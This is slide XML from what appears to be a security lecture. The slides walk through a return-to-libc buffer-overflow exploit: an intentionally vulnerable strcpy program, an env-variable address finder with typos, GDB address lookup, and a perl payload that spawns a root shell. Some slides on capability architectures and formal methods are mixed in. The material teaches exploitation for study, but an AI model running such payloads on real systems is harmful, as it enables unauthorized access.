        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Shape 789"/>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lang="en"/>
              <a:t>Provided by the HAOE book.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Really simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int main(int argc, char *argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	char buffer[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	strcpy(buffer, argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>We're going to demonstrate return to libc with this</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3" name="Shape 793"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Shape 794"/>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getenvaddr.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Shape 795"/>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lang="en"/>
              <a:t>Provided by the HAOE book.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lets you find where on the stack an env variable is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We're going to use it to find our "    /bin/sh" string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;stdlib.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;string.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	char *ptr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	if(argc &lt; 3) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>		printf("Usage: %s &lt;environment variable&gt; &lt;target program&gt;, argv[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>		exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	ptr = getenv(arg[1]); /*get env var location */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	ptr += (strlen(argv[0] - strlen(argv[2]))*2; /*adjust for program name */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	printf ("%s will be at %p\n", arg[1], ptr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>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Other Architecture Ideas and Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 140"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Tagged architecture (theoretical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Each piece of data in the system carries credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>an encryption code that ensures that the data is one that the system trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>CPU will not process data with bad credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Capability architecture (theoretical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>requires every software object to carry meta data and specific permission information that describes its access rights on the computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>check is done by a special part of the CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Trusted Computing Base (TCB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Formal methods....</a:t>
            </a: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9" name="Shape 799"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Shape 800"/>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What we need to do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Shape 801"/>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Find the address of system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find the address of exit()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if we want it to be clean (will seg fault otherwise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>seg faults can leave logs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find the address of "    /bin/sh" on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>we're going to do this to put it in the environmental variables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>export BINSH="    /bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Locate the RET value on the vulnerable program's stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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5" name="Shape 805"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="806" name="Shape 806"/>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Find system() and exit()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Shape 807"/>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lang="en"/>
              <a:t>int main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use GDB to find their addresses</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1" name="Shape 811"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="Shape 812"/>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Have all the addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Shape 813"/>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lang="en"/>
              <a:t>system = 0xb7ed0d80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit = 0xb7ec68f0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pointer to "/bin/sh" = 0xbffffe5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>These may differ for you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Now to find the RET value on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can do it by binary fuzzing, or examining the stack values with GDB</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7" name="Shape 817"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Shape 818"/>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the ret-to-libc exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Shape 819"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1704688"/>
            <a:ext cx="8748300" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$ ./vuln $(perl -e 'print "ABCD"x7 . '\x80\x0d\xed\xb7\xf0\x68\xec\xb7\x5b\xfe\xff\xbf"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Should give us:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh-3.2#</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134801"/>
            <a:ext cx="7315500" cy="1351800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Formal Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1704688"/>
            <a:ext cx="8229600" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>What FM cannot do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>proof of correctness is valid only given valid assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>can only verify that a system meets its specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>What FM can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Delimit system/application boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
